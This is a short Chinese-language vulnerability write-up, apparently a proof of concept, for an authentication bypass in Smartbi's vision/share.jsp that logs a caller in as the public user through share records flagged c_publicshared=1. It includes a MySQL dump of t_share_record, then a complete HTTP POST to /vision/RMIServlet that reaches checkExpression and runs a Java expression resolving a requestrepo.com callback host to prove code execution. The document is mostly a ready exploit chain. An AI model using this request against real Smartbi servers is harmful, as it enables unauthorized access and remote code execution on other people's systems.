Smartbi Share权限绕过

漏洞分析

vision/share.jsp

数据库查询获取c_publicshared 为1的默认ID 如果存在则自动登录为public用户

mysql> select * from t_share_record;
+-------------------------------------------+-------------------------------------------+----------+--------+-----------+-----------+-------------+---------------------+------------------+----------------+---------------+-------------+-----------+--------+--------------+---------------+---------------+-----------------------------+
| c_id                                      | c_relateid                                | c_userid | c_code | c_enddate | c_deleted | c_cancelled | c_createtime        | c_deleted_userid | c_publicshared | c_sharetarget | c_sharetype | c_purview | c_hide | c_sharegroup | c_relatename  | c_relatetype  | c_relatepath                |
+-------------------------------------------+-------------------------------------------+----------+--------+-----------+-----------+-------------+---------------------+------------------+----------------+---------------+-------------+-----------+--------+--------------+---------------+---------------+-----------------------------+
| Iff808081017e7bfb7bfbead4017e8609a8eb62d5 | 96a0a9d0b86f90d5416d013f4cfe2f23          | ADMIN    | NULL   | NULL      |         0 |           0 | 2022-01-24 00:53:53 | NULL             |              1 | NULL          |           0 | NULL      |      0 | NULL         | ??????-?????2 | ??????-?????2 | ????\?????????\?????        |
| Iff808081017e7bfb7bfbead4017e865caa8e463b | Iff808081017e7bff7bff1888017e8108eeec09bb | ADMIN    | NULL   | NULL      |         0 |           0 | 2022-01-23 04:55:27 | NULL             |              0 | NULL          |           0 | NULL      |      0 | NULL         | ????          | ????          | ????\?????????\?????\?????? |
| Iff808081017e8f318f313688017e9021513b3dfb | b904ab9f5a84712a672523a7b4881ee4          | ADMIN    | NULL   | NULL      |         0 |           0 | 2022-01-25 02:28:28 | NULL             |              1 | NULL          |           0 | NULL      |      0 | NULL         | ????          | ????          | ????\?????????\?????\?????? |
| Iff808081017e996f996f71a4017ec3a04edc562e | c9c298ba657587c42cba00490b5b07a9          | ADMIN    | NULL   | NULL      |         0 |           0 | 2022-02-04 02:26:10 | NULL             |              0 | NULL          |           0 | NULL      |      0 | NULL         | ???           | ???           | ????\?????????\?????\????   |
| Iff808081017ee7d1e7d105b1017eecfa8f2d2108 | Iff808081017ee2a0e2a05606017ee66b4a312301 | ADMIN    | NULL   | NULL      |         0 |           0 | 2022-02-12 03:09:11 | NULL             |              0 | NULL          |           0 | NULL      |      0 | NULL         | ?????????     | ?????????     | ????\???????????\????       |
+-------------------------------------------+-------------------------------------------+----------+--------+-----------+-----------+-------------+---------------------+------------------+----------------+---------------+-------------+-----------+--------+--------------+---------------+---------------+-----------------------------+
5 rows in set (0.00 sec)

符合条件的有两个默认id，使用其中一个id验证

不使用cookie

使用获取的cookie即可访问

表达式执行

POST /vision/RMIServlet  HTTP/1.1
Host: xxx.com
Cookie: JSESSIONID=38CD11F48EDF07F542F9DD644D94434C;
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 134

className=MetricsModelForVModule&methodName=checkExpression&params=["java.net.InetAddress.getByName('aaa.pjr67crh.requestrepo.com');"]